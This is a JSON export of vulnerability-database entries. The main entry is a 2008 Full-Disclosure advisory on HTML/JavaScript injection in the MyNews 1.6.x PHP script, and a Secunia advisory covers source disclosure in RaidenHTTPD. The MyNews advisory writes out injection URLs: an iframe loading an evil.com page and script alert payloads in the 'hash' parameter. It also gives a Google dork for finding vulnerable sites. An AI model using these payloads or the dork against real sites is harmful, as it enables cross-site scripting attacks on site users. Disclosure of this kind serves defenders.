{"securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": "I know its basic, but I am a supporter of FD and therefore \r\nplanetluc.com has to be\r\nblamed now! I checked their script MyNews in version 1.6.4 today and \r\nthen some\r\nother versions, all are vulnerable to HTML and JS injection.\r\n\r\n--- ADVISORY ---\r\n\r\n----------------------------\r\n|| WWW.SMASH-THE-STACK.NET ||\r\n-----------------------------\r\n\r\n|| ADVISORY: MyNews 1.6.X HTML/JS Injection Vulnerability\r\n\r\n_____________________\r\n|| 0x00: ABOUT ME\r\n|| 0x01: DATELINE\r\n|| 0x02: INFORMATION\r\n|| 0x03: EXPLOITATION\r\n|| 0x04: GOOGLE DORK\r\n|| 0x05: RISK LEVEL\r\n____________________________________________________________\r\n____________________________________________________________\r\n\r\n_________________\r\n|| 0x00: ABOUT ME\r\n\r\nAuthor: SkyOut\r\nDate: February 2008\r\nContact: skyout[-at-]smash-the-stack[-dot-]net\r\nWebsite: http://www.smash-the-stack.net/\r\n\r\n_________________\r\n|| 0x01: DATELINE\r\n\r\n2008-02-06: Bug found\r\n2008-02-06: Advisory released\r\n\r\n____________________\r\n|| 0x02: INFORMATION\r\n\r\nThe MyNews script by planetluc.com in all versions of the 1.6.X tree is\r\nvulnerable to HTML and JS injection due to no sanitation of the "hash"\r\nvalue in combination with the action "admin".\r\n\r\n_____________________\r\n|| 0x03: EXPLOITATION\r\n\r\nNo exploit is needed to test this vulnerability. You just need a working\r\nweb browser.\r\n\r\n1: HTML Injection\r\n\r\nTo make a HTML injectioni, visit the websites main page. The name \r\nmight differ\r\nfrom the original name "mynews.inc.php", mostly its called \r\n"index.php". Now\r\nconstruct a malformed URL as follows:\r\n\r\nhttp://www.example.com/index.php?hash="><iframe src=http:// \r\nwww.evil.com/ height=500px width=500px></iframe><!--&do=admin\r\n\r\nOf course you can manipulate the values of "height" and "width" like you\r\nwant to. Do it the way it best fits to your needs!\r\n\r\n2: JavaScript Injection\r\n\r\nJS injection is similar to HTML injection, just that you put a JS code\r\nin the "hash" parameter. Let me show you two examples:\r\n\r\nhttp://www.example.com/index.php?hash="><script>alert(1337);</ \r\nscript><!--&do=admin\r\n\r\nor\r\n\r\nhttp://www.example.com/index.php?hash="><script>alert("XSS");</ \r\nscript><!--&do=admin\r\n\r\nSometimes using strings doesn't work, so test it first!\r\n\r\n____________________\r\n|| 0x04: GOOGLE DORK\r\n\r\nintext:"powered by MyNews 1.6.*"\r\n\r\n___________________\r\n|| 0x05: RISK LEVEL\r\n\r\n- LOW - (1/3) -\r\n\r\n<!> Happy Hacking <!>\r\n\r\n____________________________________________________________\r\n____________________________________________________________\r\n\r\nTHE END\r\n\r\n--- ADVISORY ---\r\n\r\nSincerely,\r\nSkyOut\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "modified": "2008-02-07T00:00:00", "published": "2008-02-07T00:00:00", "id": "SECURITYVULNS:DOC:19032", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19032", "title": "[Full-disclosure] MyNews 1.6.X HTML/JS Injection Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:28", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2008-02-07T00:00:00", "published": "2008-02-07T00:00:00", "id": "SECURITYVULNS:VULN:8646", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8646", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "description": "\r\nTITLE:\r\nRaidenHTTPD Script Source Disclosure Vulnerability\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19032\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19032/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nExposure of sensitive information\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nRaidenHTTPD 1.x\r\nhttp://secunia.com/product/4614/\r\n\r\nDESCRIPTION:\r\nSecunia Research has discovered a vulnerability in RaidenHTTPD, which\r\ncan be exploited by malicious people to disclose potentially sensitive\r\ninformation.\r\n\r\nThe vulnerability is caused due to a validation error of the filename\r\nextension supplied by the user in the URL. This can be exploited to\r\nretrieve the source code of script files (e.g. PHP) from the server\r\nvia specially crafted requests containing dot, space and slash\r\ncharacters.\r\n\r\nThe vulnerability has been confirmed in version 1.1.47. Prior\r\nversions may also be affected.\r\n\r\nSOLUTION:\r\nUpdate to version 1.1.48.\r\nhttp://www.raidenhttpd.com/en/download.html\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nTan Chew Keong, Secunia Research\r\n\r\nORIGINAL ADVISORY:\r\nSecunia Research:\r\nhttp://secunia.com/secunia_research/2006-15/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2006-03-03T00:00:00", "published": "2006-03-03T00:00:00", "id": "SECURITYVULNS:DOC:11688", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11688", "title": "[SA19032] RaidenHTTPD Script Source Disclosure Vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}